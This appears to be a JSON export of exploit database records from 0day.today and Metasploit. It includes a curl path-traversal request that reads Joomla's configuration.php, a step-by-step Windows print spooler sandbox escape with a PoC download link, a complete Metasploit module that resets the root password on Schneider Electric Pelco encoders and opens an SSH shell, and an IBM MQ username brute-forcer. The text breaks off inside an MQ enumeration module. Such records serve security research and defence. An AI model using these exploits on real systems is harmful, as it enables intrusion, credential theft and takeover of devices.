{"zdt": [{"lastseen": "2019-12-04T07:40:44", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-09T00:00:00", "published": "2019-08-09T00:00:00", "id": "1337DAY-ID-33089", "href": "https://0day.today/exploit/description/33089", "title": "Joomla JS Support Ticket Component (com_jssupportticket) 1.1.5 - Arbitrary File Download Vulnerabili", "type": "zdt", "sourceData": "#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download\r\n#Dork: inurl:\"index.php?option=com_jssupportticket\"\r\n#Exploit Author: qw3rTyTy\r\n#Vendor Homepage: http://joomsky.com/\r\n#Software Link: https://www.joomsky.com/46/download/1.html\r\n#Version: 1.1.5\r\n#Tested on: Debian/nginx/joomla 3.9.0\r\n#####################################\r\n#Vulnerability details:\r\n#####################################\r\nVulnerable code is in line 1411 in file admin/models/ticket.php\r\n\r\n 1382\t function getDownloadAttachmentByName($file_name,$id){\r\n 1383\t if(empty($file_name)) return false;\r\n 1384\t if(!is_numeric($id)) return false;\r\n 1385\t $db = JFactory::getDbo();\r\n 1386\t $filename = str_replace(' ', '_',$file_name);\r\n 1387\t $query = \"SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = \".$id;\r\n 1388\t $db->setQuery($query);\r\n 1389\t $foldername = $db->loadResult();\r\n 1390\t\r\n 1391\t $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');\r\n 1392\t $base = JPATH_BASE;\r\n 1393\t if(JFactory::getApplication()->isAdmin()){\r\n 1394\t $base = substr($base, 0, strlen($base) - 14); //remove administrator \r\n 1395\t } \r\n 1396\t $path = $base.'/'.$datadirectory;\r\n 1397\t $path = $path . '/attachmentdata';\r\n 1398\t $path = $path . '/ticket/' . $foldername;\r\n 1399\t $file = $path . '/' . $filename;\r\n 1400\t\r\n 1401\t header('Content-Description: File Transfer');\r\n 1402\t header('Content-Type: application/octet-stream');\r\n 1403\t header('Content-Disposition: attachment; filename=' . basename($file));\r\n 1404\t header('Content-Transfer-Encoding: binary');\r\n 1405\t header('Expires: 0');\r\n 1406\t header('Cache-Control: must-revalidate, post-check=0, pre-check=0');\r\n 1407\t header('Pragma: public');\r\n 1408\t header('Content-Length: ' . filesize($file));\r\n 1409\t //ob_clean();\r\n 1410\t flush();\r\n 1411\t readfile($file);\t\t//!!!\r\n 1412\t exit();\r\n 1413\t exit;\r\n 1414\t }\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\n$> curl -X GET -i \"http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php\"\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33089"}, {"lastseen": "2018-03-20T01:22:35", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "href": "https://0day.today/exploit/description/29406", "id": "1337DAY-ID-29406", "title": "Microsoft Windows - Local XPS Print Spooler Sandbox Escape Exploit", "type": "zdt", "sourceData": "Windows: Local XPS Print Spooler Sandbox Escape\r\nPlatform: Windows 10 1703 and 1709 (not tested Windows 7 or 8.x)\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\n \r\nThe local print spooler can be abused to create an arbitrary file from a low privilege application including one in an AC as well as a typical Edge LPAC CP leading to EoP.\r\n \r\nDescription:\r\n \r\nWhen creating an XPS print job it's possible to specify the destination file in the DOC_INFO_1 structure passed to StartDocPrinter. When you call WritePrinter to write to the new printer job the privileged printer spooler service impersonates the caller and ensures that they can write to the target. This should ensure that a sandboxed user can't write to a location they don't have access to normally. Unfortunately the spooler then deletes this file it's created under impersonation and then calls NSecurityLibrary::ElevateIntegrityLevelIfLow to increase the IL of caller's token to Medium level if the token is current Low IL. In a naive sandbox such as IE PM this results in the actual file being written as at Medium IL which would be sufficient for writing to any user controlled location such as the Startup folder. However in an AC sandbox you'd assume this wouldn't help as the AC would still be enforced even if the IL of the token was raised. It seems not, if code raises the IL of the AC token to medium (which requires SeTcbPrivilege) then the kernel also removes all traces of the AC, leaving the final token a normal medium IL user token again. Therefore in both the naive and AC cases there exists a TOCTOU attack where you can get the sandboxed token to write to a folder you control then redirect the write to another location once the token IL is raised.\r\n \r\nThe simplest way of doing this would be your standard symbolic link attacks, fortunately Windows has mitigated all the easy ways of doing such an attack. Unfortunately there's a bug in the handling of NtImpersonateAnonymousToken when running in AC which allows a symlink attack in this specific case. I've submitted the bug in NtImpersonateAnonymousToken as a separate issue. Of course there's no reason to believe that there's no other way of exploiting this issue given enough effort without the bug in NtImpersonateAnonymousToken.\r\n \r\nTo exploit do the following:\r\n \r\n1) Create a fake destination directory in a AC writable directory such as Temp. e.g. if you want to write to c:\\users\\user\\desktop\\hello.txt create %TEMP%\\users\\user\\desktop.\r\n2) Use bug in NtImpersonateAnonymousToken to impersonate the non-AC token and create a new C: drive symlink in the anonymous user's drive map pointing at the temp directory. Note that as this is created inside a sandbox a non-sandboxed caller will NOT follow the symlink.\r\n3) Build a native NT path in Win32 form to the target path via the anonymous token's device map directory and pass to StartDocPrinter in DOC_INFO_1. e.g. \\\\?\\GLOBALROOT\\Sessions\\0\\DosDevices\\00000000-000003E6\\C:\\Users\\user\\desktop\\hello.txt\r\n4) Create the \"fake\" target file in the temp directory and put an exclusive oplock on it.\r\n5) Call WritePrinter in another thread, in original thread wait for the oplock to complete. The open in the print spooler will follow the symlink in this case as it's impersonating the sandboxed token.\r\n6) Delete the symlink and break the oplock, this allows the spooler to continue.\r\n7) The spooler now impersonates the medium user token and tried to open the path. The C: symlink created in 2 now no longer exists, however as we're using a device map directory then the global devicemap fallback will kick in so that the spooler sees the global C: drive.\r\n8) The spooler writes arbitrary data to the new target file outside of the sandboxed area.\r\n \r\nI really don't get why the token is elevated before writing the file. There is a mode where if you don't specify a path then the spooler will write the file to the local documents directory. As the sandboxed application has no control of the path it at least makes some sense to elevate to allow the file to be written but when writing an explicit path it seems unnecessary. Note that this also works from LPAC, at least as implemented for Edge CP's. This is because the ALPC port of the spooler has an ACE with the \u201clpacPrinting\u201d capability which is in the list of capabilities in most (all?) CP's for Edge. I also note that WDAG supports writing XPS files, but I don\u2019t have the time to work out the details of how WDAG works right now to see if it would also be vulnerable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. The PoC will drop the file hello.txt to the current user\u2019s desktop with arbitrary contents. The PoC will respawn itself as the Microsoft Edge AC and then execute the exploit. You must run this as a UAC split token admin. Note that this ISN\u2019T a UAC bypass, just that a split-token admin has a trivial way of getting a non-AC token by requesting the linked token. The PoC will execute just using a normal AC, to test with LPAC pass the executable any argument you like, the LPAC capabilities are copied from an Edge CP so should be representative of what\u2019s available in real life. It seems on some systems the .NET framework directory has an incorrect DACL which results in the LPAC mode failing. A fresh install of 1709 should work though.\r\n \r\n1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. Ensure the main executable and DLLs are in a user writable location (this is needed to tweak the file permissions for AC).\r\n2) Execute the PoC as normal user level split-token admin.\r\n3) Once complete a dialog should appear indicating the operation is Done.\r\n \r\nExpected Result:\r\nWriting to a file outside of a sandbox accessible directory should fail.\r\n \r\nObserved Result:\r\nThe file hello.txt is created in the current user\u2019s desktop directory with arbitrary contents.\r\n \r\nMicrosoft have made the decision that as the issue with NtImpersonateAnonymousToken (https://bugs.chromium.org/p/project-zero/issues/detail?id=1414) is now fixed then you can no longer exploit this issue. I disagree with this assessment as there's always scope for new ways of getting similar symbolic link like functionality. The printer APIs allow passing an arbitrary Win32 path which doesn't seem to get translated so there's plenty of scope for abuse. You can also still exploit it from a low-IL sandbox as you can still get access to the anonymous token's dos device directory, however MS don't really consider that a security boundary.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43465.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29406"}], "metasploit": [{"lastseen": "2019-11-29T02:27:11", "bulletinFamily": "exploit", "description": "This module exploits inadequate access controls within the webUI to enable the SSH service and change the root password. This module has been tested successfully on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.\n", "modified": "2019-07-22T17:24:55", "published": "2019-07-11T18:10:37", "id": "MSF:EXPLOIT/UNIX/HTTP/SCHNEIDER_ELECTRIC_NET55XX_ENCODER", "href": "", "type": "metasploit", "title": "Schneider Electric Pelco Endura NET55XX Encoder", "sourceData": "\ufeff##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::SSH\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Schneider Electric Pelco Endura NET55XX Encoder\",\n 'Description' => %q(\n This module exploits inadequate access controls within the webUI to enable\n the SSH service and change the root password. This module has been tested successfully\n on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Lucas Dinucci <idntk.lucdin@gmail.com>',\n 'Vitor Esperan\u00e7a <vitor@machiaveliclabs.com>'\n ],\n 'References' =>\n [\n ['CVE', '2019-6814'],\n ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']\n ],\n 'Payload' =>\n {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find'\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [ [ \"Universal\", {} ] ],\n 'Privileged' => true,\n 'DisclosureDate' => \"Jan 25 2019\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),\n OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])\n ]\n )\n\n register_advanced_options(\n [\n OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])\n ]\n )\n end\n\n def new_password\n datastore['NEW_PASSWORD']\n end\n\n def check\n xmlPayload = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>'\\\n '<Envelope xmlns=\"http://www.w3.org/2003/05/soap-envelope\">'\\\n '<Header xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\">'\\\n '<a:Action mustUnderstand=\"1\">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\\\n '<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\\\n '<a:ReplyTo>'\\\n '<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\\\n '</a:ReplyTo>'\\\n '<a:To mustUnderstand=\"1\">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\\\n '</Header>'\\\n '<Body>'\\\n '<Probe xmlns=\"http://schemas.xmlsoap.org/ws/2005/04/discovery\">'\\\n '<Types xmlns:dp0=\"http://www.onvif.org/ver10/network/wsdl\">dp0:NetworkVideoTransmitter</Types>'\\\n '</Probe>'\\\n '</Body>'\\\n '</Envelope><?xml version=\"1.0\" encoding=\"UTF-8\"?>'\n\n connect_udp(true, {'RPORT' => datastore['UDP_PORT']})\n udp_sock.put(xmlPayload)\n resp = []\n resp << udp_sock.get(datastore['TIMEOUT'])\n xmlResponse = resp.join(',')\n disconnect_udp\n if xmlResponse.include?(\"NET5501\") || xmlResponse.include?(\"NET5501-I\") || xmlResponse.include?(\"NET5501-XT\") || xmlResponse.include?(\"NET5504\") || xmlResponse.include?(\"NET5500\") || xmlResponse.include?(\"NET5516\") || xmlResponse.include?(\"NET5508\")\n return Exploit::CheckCode::Appears\n end\n CheckCode::Safe\n end\n\n def change_password\n print_status(\"#{peer} - Attempt to change the root password...\")\n post = {\"enable\": true, \"passwd\": new_password, \"userid\": \"root\"}.to_json\n\n login = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),\n 'data' => post,\n 'headers' =>\n {\n 'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',\n 'Content-Type' => 'application/json;charset=utf-8'\n }\n }, timeout=datastore['TIMEOUT'])\n\n fail_with(Failure::UnexpectedReply, \"Failed to change root password\") unless login && login.code == 200\n print_good(\"#{rhost}:80 - Successfully changed the root password...\")\n print_good(\"#{rhost}:80 - New credentials: User: root / Password: #{new_password}\")\n end\n\n def do_login\n change_password\n print_status(\"#{rhost}:22 - Attempt to start a SSH connection...\")\n factory = ssh_socket_factory\n opts = {\n :auth_methods => ['password', 'keyboard-interactive'],\n :port => 22,\n :use_agent => false,\n :config => true,\n :password => new_password,\n :proxy => factory,\n :non_interactive => true,\n :verify_host_key => :never\n }\n opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\n begin\n ssh = nil\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)\n end\n rescue Rex::ConnectionError\n rescue Net::SSH::Disconnect, ::EOFError\n print_error \"#{rhost}:22 SSH - Disconnected during negotiation\"\n rescue ::Timeout::Error\n print_error \"#{rhost}:22 SSH - Timed out during negotiation\"\n rescue Net::SSH::AuthenticationFailed\n print_error \"#{rhost}:22 SSH - Failed authentication\"\n rescue Net::SSH::Exception => e\n print_error \"#{rhost}:22 SSH Error: #{e.class} : #{e.message}\"\n end\n if ssh\n conn = Net::SSH::CommandStream.new(ssh)\n return conn\n end\n end\n\n def exploit\n conn = do_login\n if conn\n print_good(\"#{rhost}:22 - Session established \")\n handler(conn.lsock)\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb"}, {"lastseen": "2019-10-12T16:05:12", "bulletinFamily": "exploit", "description": "This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.\n", "modified": "2019-08-15T23:10:44", "published": "2018-10-28T19:29:45", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_LOGIN", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Login Check", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Login Check',\n 'Description' => 'This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 5]),\n OptInt.new('CONCURRENCY', [true, \"The number of usernames to check concurrently\", 10]),\n OptString.new('QUEUE_MANAGER', [true, \"Queue Manager name to use\" ,\"\"]),\n OptString.new('CHANNEL', [true, \"Channel to use\" ,\"SYSTEM.ADMIN.SVRCONN\"]),\n OptString.new('PASSWORD', [false, \"Optional password to attempt with login\"]),\n OptPath.new('USERNAMES_FILE',\n [ true, \"The file that contains a list of usernames. UserIDs are case insensitive!\"]\n )])\n #deregister_options('THREADS')\n end\n\n def run_host(ip)\n @usernames = []\n if datastore['CHANNEL'].length.to_i > 20\n print_error(\"Channel name cannot be more that 20 characters.\")\n exit\n end\n if datastore['QUEUE_MANAGER'].length.to_i > 48\n print_error(\"Queue Manager name cannot be more that 48 characters.\")\n exit\n end\n begin\n username_list\n rescue ::Rex::ConnectionError\n rescue ::Exception => e\n print_error(\"#{e} #{e.backtrace}\")\n end\n print_line\n if(@usernames.empty?)\n print_status(\"#{ip}:#{rport} No valid users found.\")\n else\n print_good(\"#{ip}:#{rport} Valid usernames found: #{@usernames}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.usernames'\n )\n print_line\n end\n end\n\n def first_packet(channel,qm_name)\n init1 = \"\\x54\\x53\\x48\\x20\" + \t# StructId\n \"\\x00\\x00\\x01\\x0c\" + \t\t# MQSegmLen\n \"\\x01\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x00\\x00\\x01\\x11\" + \t\t# Encoding\n \"\\x04\\xb8\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0d\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# InierrFlg1\n \"\\x00\\x00\" + \t\t\t# ReserveD\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\x00\\x00\\x7f\\xec\" + \t\t# MaxTrSize\n \"\\x06\\x40\\x00\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\x04\\xb8\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x00\\x00\\x00\\x01\" + \t\t# HBInterval\n \"\\x00\\x8a\" + \t\t\t# EFLLength\n \"\\x00\" +\t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst2\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x00\\x00\\x00\\x0a\" + \t\t# ConvBySkt\n \"\\x08\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x00\\x00\\x00\\x1b\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 + \t\t# MQM ID\n \"\\x00\\x01\\x00\\x00\\xff\\xff\\xff\\xff\" +# Unknown1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# Unknown2\n \"\\xff\\xff\\xff\\xff\\xf1\\x18\\xa6\\x93\" +# Unknown3\n \"\\x2b\\x8a\\x44\\x3c\\x67\\x53\\x73\\x08\"\t# Unknown4\n end\n\n def second_packet(channel,qm_name)\n init2 = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xf4\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers Id\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request Id\n \"\\x02\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0c\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" + \t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\xb5\\x01\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x2c\\x01\\x00\\x00\" + \t\t# HBInterval\n \"\\x8a\\x00\" + \t\t\t# EFLLength\n \"\\x00\" + \t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst2\n \"\\xff\\xff\" + \t\t\t# MsgCprsLst3\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x0a\\x00\\x00\\x00\" + \t\t# ConvBySkt\n \"\\x00\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x1b\\x00\\x00\\x00\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 \t\t# MQM ID\n end\n\n def send_userid(userid,uname)\n\n if datastore['PASSWORD'].nil?\n password = \"\\x00\" * 12\n else\n password = datastore['PASSWORD']\n if (password.length > 12)\n print_warning(\"Passwords greater than 12 characters are unsupported. Truncating...\")\n password = password[0..12]\n end\n password = password + ( \"\\x00\" * (12-password.length) )\n end\n vprint_status(\"Using password: '#{password}' (Length: #{password.length})\")\n\n send_userid = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xa8\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x08\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x55\\x49\\x44\\x20\" + \t\t# StructId\n userid + \t\t\t\t# UserId - Doesnt affect anything\n password + # Password\n uname + \t\t\t\t# Long UID - This matters!\n \"\\x00\" + \t\t\t\t# SID Len\n \"\\x00\" * 39 \t\t\t# Unknown\n end\n\n def start_conn(qm_name)\n start_conn = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x01\\x38\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x81\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x00\\x00\\x01\\x38\" + \t\t# Reply Len\n \"\\x00\\x00\\x00\\x00\" + \t\t# Compl Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Reason Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Object Hdl\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x4d\\x51\\x20\\x45\\x78\\x70\\x6c\" + \t# Appl Name\n \"\\x6f\\x72\\x65\\x72\\x20\\x39\\x2e\" + \t# Appl Name\n \"\\x30\\x2e\\x30\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x1c\\x00\\x00\\x00\" + \t\t# ApplType\n \"\\x00\" * 32 + \t\t\t# AccntTok\n \"\\x03\\x00\\x00\\x00\" + \t\t# MQCONNX\n \"\\x00\\x00\\x00\\x00\" + \t\t# Options\n \"\\x46\\x43\\x4e\\x4f\" + \t\t# Struct ID\n \"\\x02\\x00\\x00\\x00\" + \t\t# Version\n \"\\x00\\x00\\x00\\x00\" + \t\t# Option\n \"\\x4d\\x51\\x4a\\x42\\x30\\x39\\x30\" + \t# msgid\n \"\\x30\\x30\\x30\\x30\\x34\" + \t\t# msgid\n \"MQM\" + \"\\x20\" * 45 + \t\t# MqmId\n \"\\x00\" * 68\t\t\t\t# Unknown\n end\n\n def username_list\n username_data = get_usernames\n while (username_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_username = username_data.shift\n if this_username.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_username) do |username|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{username}...\"\n channel = datastore['CHANNEL']\n if channel.length > 20\n print_error(\"Channel name must be less than 20 characters.\")\n next\n end\n channel += \"\\x20\" * (20-channel.length.to_i) # max channel name length is 20\n qm_name = datastore['QUEUE_MANAGER']\n if qm_name.length > 48\n print_error(\"Queue Manager name must be less than 48 characters.\")\n next\n end\n qm_name += \"\\x20\" * (48-qm_name.length.to_i) # max queue manager name length is 48\n if username.length > 12\n print_error(\"Username must be less than 12 characters.\")\n next\n end\n uname = username + \"\\x20\" * (64-username.length.to_i)\n userid = username + \"\\x20\" * (12 - username.length.to_i) # this doesnt make a difference\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(first_packet(channel,qm_name))\n first_response = s.get_once(-1,timeout)\n if first_response[-4..-1] == \"\\x00\\x00\\x00\\x02\" # CHANNEL_WRONG_TYPE code\n print_error(\"Channel needs to be MQI type!\")\n next\n end\n s.put(second_packet(channel,qm_name))\n second_response = s.get_once(-1,timeout)\n s.put(send_userid(userid,uname))\n s.put(start_conn(qm_name))\n data = s.get_once(-1,timeout)\n if data[41..44] == \"\\x00\\x00\\x00\\x00\"\n print_status(\"Found username: #{username}\")\n @usernames << username\n end\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_usernames\n if(! @common)\n File.open(datastore['USERNAMES_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_login.rb"}, {"lastseen": "2019-11-13T17:23:40", "bulletinFamily": "exploit", "description": "Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.\n", "modified": "2018-11-21T22:09:18", "published": "2018-10-28T16:09:17", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_ENUM", "href": "", "type": "metasploit", "title": "Identify Queue Manager Name and MQ Version", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Identify Queue Manager Name and MQ Version',\n 'Description' => 'Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.',\n 'Author' => [ 'Petros Koutroumpis' ],\n 'License' => MSF_LICENSE\n ))\n register_options(\n [\n OptString.new('CHANNEL', [ true, \"Channel to use\" ,\"SYSTEM.DEF.SVRCONN\"]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent ports to check per host\", 10]),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptString.new('PORTS', [true, 'Ports to probe', '1414']),\n\n ])\n deregister_options('RPORT')\n end\n\n\n def create_packet(channel_type)\n chan = datastore['CHANNEL'] + \"\\x20\"*(20-datastore['CHANNEL'].length.to_i)\n if channel_type == 0\n chan_type = \"\\x26\"\n elsif channel_type == 1\n chan_type = \"\\x07\"\n elsif channel_type == 2\n 